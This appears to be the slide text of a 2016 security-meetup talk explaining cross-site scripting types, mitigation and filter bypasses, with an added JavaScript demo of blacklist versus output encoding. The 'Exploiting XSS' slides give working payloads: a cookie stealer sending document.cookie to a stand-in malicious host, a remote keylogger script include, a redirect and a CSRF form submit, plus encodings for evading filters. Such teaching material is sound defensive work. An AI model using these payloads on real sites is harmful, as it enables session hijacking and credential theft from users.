Cross Site Scripting (XSS) @nullhyd – June '16
#Whoami?
• @NahtnahS
• Web App Security Guy
• Works as Security Analyst
• Some HOF & acknowledgements
Current Stats
Experts say
Definition
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted web sites.
Source: owasp.org
Anatomy of XSS
HTML Source Code
Types Of XSS
• Reflected
• Stored
• DOM
Reflected XSS
• A reflected attack is generally used to exploit script injection vulnerabilities via a URL in a web application: the payload is carried in the request and echoed straight back in the response.
How it is exploited? (diagram)
• Attacker creates a malicious link
• Attacker sends the link to the victim
• Victim requests the web page
• The page sends data to the attacker
Stored XSS
• Stored XSS occurs when the injected script is stored in the database and is delivered to every visitor of the application.
How stored XSS is exploited (diagram)
• Attacker injects a malicious script into the web server
• The code gets saved into the database
• Victim visits the infected web page
• The malicious code gets executed in the victim's browser
• The browser sends data to the attacker
DOM XSS
• DOM-based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM "environment" in the victim's browser used by the original client-side script, so that the client-side code runs in an "unexpected" manner. The payload need not reach the server at all (for example a fragment after # is never sent), so server-side filtering does not see it.
Attacks executed by exploiting XSS
• Session Hijacking
• Redirection
• Phishing
• Keylogging
• CSRF
Exploiting XSS
• Redirection:
<script>document.location.href="http://www.MaliciousSite.com/"</script>
• Session Hijacking (only works while the session cookie is readable from script, i.e. not flagged HttpOnly):
<script>document.location.href="http://www.MaliciousSite.com/cookiestealer.php?cookie="+document.cookie</script>
• KeyLogging:
<script src="http://www.MaliciousSite.com/keylogger.js"></script>
Exploiting XSS
• CSRF (the injected script submits a form on the victim's behalf, so a page with XSS cannot be protected by a CSRF token alone)
o Page 1:
<form name="delete" action="http://yoursite.com/deleteuser" method="post">
<input type="hidden" name="userid" value="1">
<input type="submit">
</form>
o Page 2:
"><script>document.forms["delete"].submit();</script>
Prevention?
• Never Trust User Input.
• Never Trust User Input.
• Never Trust User Input.
• Never Trust User Input.
• Never Trust User Input.
• Never Trust User Input.
• Never Trust User Input.
Mitigation
• Input validation
• Output Encoding:
o < > → &lt; &gt;
o ( ) → &#40; &#41;
o # & → &#35; &amp;
• Do not use "blacklist" validation
• Specify the output encoding (the charset of the response, so the browser cannot guess a different one)
• Content Security Policy
Bypassing XSS Filters
Encoding techniques work sometimes, because a filter that looks for the literal character runs before the browser or the application decodes the input. Possible ways to represent '<':
<, %3C, &lt;, &LT;, &lt, &#60;, &#060;, &#0060;, &#x3c;, &#x3C;, &#X3c;, &#X3C;, \x3c, \x3C, \u003c, \u003C
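The two points above (blacklist validation fails; output encoding at the point of output does not) in one runnable comparison. This is an added example, not code from the talk: the search page, the blacklist and the query values are constructed here, and the blacklist is deliberately the naive kind the slides warn against.

```javascript
// Added example (not from the slides). Contrast a character blacklist applied
// to the raw query string with output encoding applied when the page is built.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };

// Output encoding for an HTML text node: runs at the point of output, after
// every decoding step, so any representation of '<' has become a literal '<'.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"'/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Blacklist of the kind the slides warn against: rejects a raw '<' in the
// incoming query value and nothing else. It never sees %3C.
function blacklistRejects(rawQueryValue) {
  return rawQueryValue.includes("<");
}

// Simulated web app: takes the raw value from the URL, URL-decodes it (as any
// framework does), then reflects it in a "you searched for" paragraph.
function renderSearch(rawQueryValue, { useOutputEncoding }) {
  if (blacklistRejects(rawQueryValue)) return "<p>blocked</p>";
  const term = decodeURIComponent(rawQueryValue);
  const shown = useOutputEncoding ? encodeForHtml(term) : term;
  return `<p>You searched for: ${shown}</p>`;
}

// True if the rendered HTML contains any tag other than the page's own <p>/</p>.
function injectedMarkup(html) {
  return /<(?!\/?p>)[a-z/]/i.test(html);
}

// Constructed query value: URL-encoded, so it passes the blacklist and decodes
// to the same <script> payload the slides use.
const SAMPLE_RAW = "%3Cscript%3Ealert(1)%3C%2Fscript%3E";

function demo() {
  return {
    rawLiteral: renderSearch("<b>x</b>", { useOutputEncoding: false }), // blacklist catches this one
    blacklistOnly: injectedMarkup(renderSearch(SAMPLE_RAW, { useOutputEncoding: false })), // true: bypassed
    withEncoding: injectedMarkup(renderSearch(SAMPLE_RAW, { useOutputEncoding: true })),   // false: inert text
  };
}
```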
DEMO
Questions?
Thank You!